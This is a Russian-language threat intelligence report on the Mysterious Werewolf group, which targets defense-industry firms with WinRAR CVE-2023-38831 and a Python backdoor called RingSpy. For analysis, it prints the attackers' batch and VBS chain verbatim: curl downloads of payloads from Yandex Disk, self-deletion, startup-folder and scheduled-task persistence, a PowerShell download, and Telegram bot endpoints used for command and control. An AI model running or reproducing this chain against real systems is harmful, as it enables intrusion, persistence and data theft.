Mysterious Werewolf атакует ВПК с помощью нового бэкдора RingSpy
Специалисты BI.ZONE Threat Intelligence обнаружили новую кампанию кластера Mysterious Werewolf, который активен как минимум с 2023 года. Теперь злоумышленники атакуют предприятия военно-промышленного комплекса (ВПК). Для этого они используют фишинговые письма с приложенным архивом, который содержит легитимный документ в формате PDF, а также вредоносный файл CMD. После открытия архива и двойного щелчка по документу эксплоит запускает файл CMD, чтобы доставить в скомпрометированную систему оригинальный бэкдор RingSpy. Это вредоносное ПО выступает вместо агента Athena фреймворка Mythic, который Mysterious Werewolf применяли в предыдущих атаках.
- Mysterious Werewolf продолжает использовать фишинговые письма и уязвимость CVE‑2023‑38831 в WinRAR для выполнения вредоносного кода в целевых системах.
- Злоумышленники экспериментируют с вредоносной нагрузкой: агент Athena фреймворка Mythic заменили на оригинальный бэкдор RingSpy, написанный на Python.
- Кластер продолжает использовать легитимные сервисы для взаимодействия со скомпрометированными системами: в качестве командного сервера выступает бот в мессенджере Telegram.
Предположительно, жертва получала по электронной почте архив, содержащий возможность реализации уязвимости CVE‑2023‑38831. При открытии легитимного файла вместо него запускался вредоносный скрипт, например O_predostavlenii_kopii_licenzii.pdf .cmd, который реализовывал следующие действия:
- Создавал файл
.vbsв папкеC:\Users\[user]\AppData\Localи записывал скрипт, запускающий файл, имя которого было передано как аргумент. - Создавал файл
1.batв папкеC:\Users\[user]\AppData\Localи запускал его с помощью командыcall "%localappdata%\.vbs" "%localappdata%\1.bat". - После запуска производил самоудаление:
(goto) 2>nul & del "%~f0".
Запуск 1.bat приводил к реализации следующих действий:
-
Получению ссылки для загрузки следующей стадии заражения и сохранения его в файл
rв папкеC:\Users\[user]\AppData\Local:curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json" -
Загрузке файла с помощью ссылки, полученной ранее:
set /p B=<"C:\Users\[redacted]\AppData\Local\r"
curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json" -
Удалению файла со ссылкой на загрузку:
del /s /q "C:\Users\thesage\AppData\Local\r -
Запуску загруженного файла с помощью
.vbs:call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat -
Самоудалению после запуска:
(goto) 2>nul & del "%~f0"
Запуск скрипта i.bat приводил к реализации следующих действий:
-
Предотвращению повторной установки путем проверки наличия файла
C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db. Если данного файла нет, то он создается, а выполнение продолжается:if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
exit 0
)
echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db" -
Получению адреса загрузки и загрузке отвлекающего документа (рис. ниже), его открытию, а также удалению файла, содержащего ссылку на скачивание:
curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%PDF_FOLDER%\r"
curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
del /s /q "%PDF_FOLDER%\r"
Отвлекающий документ
-
Загрузке интерпретатора Python с официального сайта и распаковке в папку
C:\Users\[redacted]\AppData\Local\Python, а затем к удалению архива.При этом используются следующие переменные:curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
if exist "%FOLDER%" (
rmdir /s /q "%FOLDER%"
mkdir "%FOLDER%"
) else (
mkdir "%FOLDER%"
)
tar -xf %localappdata%\python.zip -C "%FOLDER%"
del /s /q %localappdata%\python.zip.FOLDER=%localappdata%\PythonPYTHON_VERSION_FIRST_TWO_PARTS=3.11PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
-
Установке атрибута скрытой папке
C:\Users\[redacted]\AppData\Local\Python:attrib +h "%FOLDER%" /s /d - Созданию файла
C:\Users\[redacted]\AppData\Local\python311._pthсо следующим содержимым:Lib/site-packages
python.zip
.
# Uncomment to run site.main() automatically
import site - Получению и запуску установщика pip, используемого для загрузки дополнительных пакетов:
(cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
call python -m pip install requests
call python -m pip install schedule
del /s /q get-pip.py - Сохранению в файл
C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloudконфигурации для соединения RingSpy с ботом в мессенджере Telegram. - Загрузке Python-скрипта бэкдора RingSpy с использованием API «Яндекс Облака»:
Если существует файл
curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%FOLDER%\r"
echo "%B:~9,426%"
curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
del /s /q "%FOLDER%\r".vbsв папкеC:\Users\[user]\AppData\Local, он удаляется. - Созданию файла
python.vbsв папкеC:\Users\[redacted]\AppData\Local\Pythonсо следующим содержимым:Set oShell = CreateObject("Wscript.Shell")
oShell.Run “C:\Users\[redacted]\AppData\Local\Python\python.exe” "C:\Users\[redacted]\AppData\Local\Python\f.py” , 0, true - Копированию созданного файла в папку автозапуска:
copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" -
Запуску созданного файла:
call "%localappdata%\Python\python.vbs" - Запуску скачанного файла бэкдора и самоудалению, даже если файл
.vbsотсутствует:(goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"
Бэкдор RingSpy позволяет злоумышленнику удаленно выполнять команды, получать их результат, а также скачивать файлы с сетевых ресурсов. При указании опции запуска -f создает задачу в планировщике на запуск скрипта python.vbs каждую минуту:
powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1
Управляющий сервер бэкдора — бот в мессенджере Telegram. При успешном выполнении команд вывод записывается в файл C:\Users\[redacted]\AppData\Local\Python\rs.txt, а затем отправляется на управляющий сервер в виде файла.
Для загрузки файла с указанного сетевого расположения используется следующая команда PowerShell:
powershell.exe Invoke-WebRequest -Uri "http://[сетевой ресурс]/[имя файла]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[имя файла]"
Файлы на управляющий сервер отправляются с использованием сетевого ресурса https://api.telegram.org/bot[токен бота]/sendDocument, а текст — https://api.telegram.org/bot[токен бота]/sendMessage.
5183844b5e67e204efa4b44e12fa8f4e76b0c05bf735fc5e792041842c4b486a9bf750d19eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Использует фишинговые письма для получения первоначального доступа |
| Execution |
Command and Scripting Interpreter: PowerShell |
Использует PowerShell для выполнения команд и сценариев |
|
Command and Scripting Interpreter: Windows Command Shell |
Использует командную строку Windows для выполнения команд и сценариев |
|
|
Command and Scripting Interpreter: Visual Basic |
Использует VBS‑сценарии |
|
|
Command and Scripting Interpreter: Python |
Использует интерпретатор Python для выполнения кода бэкдора |
|
|
Exploitation for Client Execution |
Использует уязвимость CVE‑2023‑38831 в WinRAR для выполнения вредоносного кода |
|
| Persistence |
Scheduled Task / Job: Scheduled Task |
Использует планировщик задач Windows для закрепления в скомпрометированной системе |
|
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Использует папку автозагрузки для закрепления в скомпрометированной системе |
|
| Defense Evasion |
Indicator Removal: File Deletion |
Удаляет файлы после выполнения |
| Command and Control |
Ingress Tool Transfer |
Загружает файлы с удаленных ресурсов |
|
Web Service: Bidirectional Communication |
Использует бот в мессенджере Telegram в качестве командного сервера |
Больше индикаторов компрометации и детальное описание тактик, техник и процедур доступно на платформе BI.ZONE Threat Intelligence.
Кластер Mysterious Werewolf продолжает развивать методы атак, в этот раз целясь в наиболее чувствительные части критической инфраструктуры ВПК. Чтобы взаимодействовать со скомпрометированными системами, злоумышленники стали чаще применять легитимные сервисы. Это еще раз доказывает необходимость эффективной защиты конечных точек и их круглосуточного мониторинга, например, в рамках сервиса BI.ZONE TDR. А своевременно полученные данные киберразведки с платформы BI.ZONE Threat Intelligence позволят узнавать о новых методах злоумышленников на ранних этапах и повысить эффективность средств защиты.